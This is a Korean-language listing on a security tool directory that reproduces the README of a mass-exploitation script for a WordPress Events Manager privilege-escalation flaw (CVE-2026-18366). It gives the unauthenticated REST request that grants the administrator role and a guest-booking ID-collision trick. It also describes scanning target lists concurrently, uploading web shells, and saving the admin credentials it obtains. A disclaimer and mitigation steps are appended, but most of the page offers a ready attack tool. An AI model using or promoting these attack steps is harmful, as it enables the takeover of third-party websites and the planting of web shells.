Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-18366 — Events Manager < 7.4.1 - 인증되지 않은 관리자 권한 상승 | Kitploit
도구/GitHubGitHub/nxploited/cve-2026-18366
Privilege EscalationWeb Vulnerability ScannersExploitationWeb Application ExploitationInformation GatheringPost-Exploitation
GitHubnxploited/cve-2026-18366

CVE-2026-18366

Events Manager < 7.4.1 - 인증되지 않은 관리자 권한 상승

저장소 보기
1124일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-18366

Events Manager < 7.4.1 - 인증되지 않은 관리자 권한 상승

CVE CVSS WordPress

Typing SVG


🔗 최신 정보 받기

Telegram

최신 제로데이, 익스플로잇 및 보안 연구를 확인하세요

Telegram Channel


📋 취약점 개요


🔍 기술적 설명

근본 원인 분석

취약점은 classes/em-archetypes.php의 EM\Archetypes::map_meta_cap에 존재합니다. 플러그인은 다음과 같은 방식으로 권한 매핑 범위를 부적절하게 지정합니다:

  1. 모든 객체 ID를 게시물 ID로 취급
  2. 게시물이 event 또는 location CPT인 경우 $caps = []를 비워버림
  3. edit_user, delete_user, promote_user에 대한 권한을 다시 채우지 않음
  4. 빈 caps → has_cap()이 user 0(게스트)을 포함해 true를 반환

공격 벡터

root@kitploit:~
POST|PUT|PATCH  /wp-json/wp/v2/users/{id}
POST            /index.php?rest_route=/wp/v2/users/{id}

Body: {"password":"...","roles":["administrator"]}

조건: {id}는 event 또는 location CPT의 wp_posts.ID와 일치해야 합니다.

⚠️ 인증되지 않은 REST는 nonce가 필요하지 않습니다(로그인 쿠키 없음).

게스트 예약 악용

게스트 예약(기본값 dbem_bookings_anonymous=1)은 실제 WP 사용자를 생성하므로 ID 충돌을 강제할 수 있습니다. 예약 nonce는 이벤트 양식에서 공개적으로 확인할 수 있습니다.


🚀 사용법

요구 사항

root@kitploit:~
pip install aiohttp

빠른 시작

root@kitploit:~
python CVE-2026-18366.py

스크립트가 다음 항목을 입력받습니다:

  • list → 대상 목록 파일 경로 (기본값: list.txt)
  • speed → 동시 작업 수 (기본값: 10)

명령줄 옵션

root@kitploit:~
python CVE-2026-18366.py -l targets.txt -s 20 --timeout 30
옵션설명
-l, --list대상 URL이 포함된 파일 경로
-s, --speed동시 작업 수 (1-200)
--timeout요청 제한 시간(초) (기본값: 20)

대상 목록 형식

한 줄에 대상 하나씩 list.txt 파일을 생성하세요:

root@kitploit:~
https://target1.com
https://target2.com/wordpress
http://target3.com
target4.com

📊 출력

콘솔 출력

root@kitploit:~
[+] [HH:MM:SS] target.com  ADMIN  username:password  uid=X  path
[+] [HH:MM:SS] target.com  SHELL  https://target.com/wp-content/plugins/...

결과 파일

성공적으로 공격된 대상은 adminS.txt에 저장됩니다:

root@kitploit:~
https://target.com | username:Nx_admin_@!KSA | uid=X | path=id-collision | ADMIN | shell_url

🔄 악용 워크플로우

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│                    CVE-2026-18366 Flow                          │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  ┌──────────┐    ┌─────────────┐    ┌──────────────────────┐   │
│  │  Detect  │ →  │ Collect IDs │ →  │  PATH A: ID Brute    │   │
│  │  Plugin  │    │  (CPT/HTML) │    │  REST /users/{id}    │   │
│  └──────────┘    └─────────────┘    └──────────┬───────────┘   │
│                                                 │               │
│                                          ┌──────▼──────┐        │
│                                          │   Success?  │        │
│                                          └──────┬──────┘        │
│                                       No │      │ Yes           │
│                               ┌──────────▼──────▼──────────┐    │
│                               │                            │    │
│  ┌──────────────────────┐     │    ┌─────────────────┐     │    │
│  │  PATH B: Guest Book  │ ←───┘    │  Login + Verify │     │    │
│  │  Create user until   │          │  Admin Access   │     │    │
│  │  user_id == post_id  │          └────────┬────────┘     │    │
│  └──────────────────────┘                   │              │    │
│                                    ┌────────▼────────┐     │    │
│                                    │  Upload Shell   │     │    │
│                                    │  (Plugin/Theme) │     │    │
│                                    └────────┬────────┘     │    │
│                                             │              │    │
│                                    ┌────────▼────────┐     │    │
│                                    │   Save Results  │     │    │
│                                    │   adminS.txt    │     │    │
│                                    └─────────────────┘     │    │
│                                                            │    │
└────────────────────────────────────────────────────────────────┘

⚙️ 기능

  • 비동기 아키텍처 → 고성능 동시 스캐닝
  • 이중 공격 경로 → ID 충돌 + 게스트 예약 악용
  • 자동 셸 업로드 → 플러그인/테마 웹셸 배포
  • 버전 탐지 → 취약한 버전 자동 식별
  • 스마트 사용자명 열거 → 다양한 열거 기법
  • 로그인 검증 → 쿠키 + XML-RPC 검증
  • 권한 상승 → 관리자로 자동 승격

📁 파일 구조

root@kitploit:~
├── CVE-2026-18366.py    # Main exploit script
├── list.txt             # Target URLs (create this)
├── adminS.txt           # Successful results (auto-created)
└── README.md            # This documentation

⚠️ 면책 조항

root@kitploit:~
╔══════════════════════════════════════════════════════════════════╗
║                        LEGAL DISCLAIMER                          ║
╠══════════════════════════════════════════════════════════════════╣
║                                                                  ║
║  This tool is provided for EDUCATIONAL and AUTHORIZED           ║
║  SECURITY TESTING purposes only.                                ║
║                                                                  ║
║  • Only use on systems you own or have explicit permission      ║
║  • Unauthorized access to computer systems is ILLEGAL           ║
║  • The author is NOT responsible for any misuse or damage       ║
║  • By using this tool, you agree to these terms                 ║
║                                                                  ║
║  Use responsibly. Stay ethical. Respect the law.                ║
║                                                                  ║
╚══════════════════════════════════════════════════════════════════╝

🛡️ 완화 조치

WordPress 관리자라면 다음을 수행하세요:

  1. 업데이트 — Events Manager를 7.4.1 이상 버전으로 업데이트
  2. 감사 — 승인되지 않은 변경 사항이 있는지 사용자 계정 점검
  3. 검토 — 의심스러운 REST API 활동이 있는지 액세스 로그 확인
  4. 구현 — 악성 요청을 필터링하는 WAF 규칙 적용

👤 작성자

Nxploited (Khaled Alenzi)

Telegram


보안 연구 • 윤리적 해킹 • 제로데이 발견

도구 다운로드
항목세부 정보
CVE IDCVE-2026-18366
심각도🔴 치명적 (CVSS 9.8)
플러그인Events Manager for WordPress
영향받는 버전< 7.4.1
취약점 유형인증되지 않은 권한 상승
공격 벡터네트워크
인증 필요없음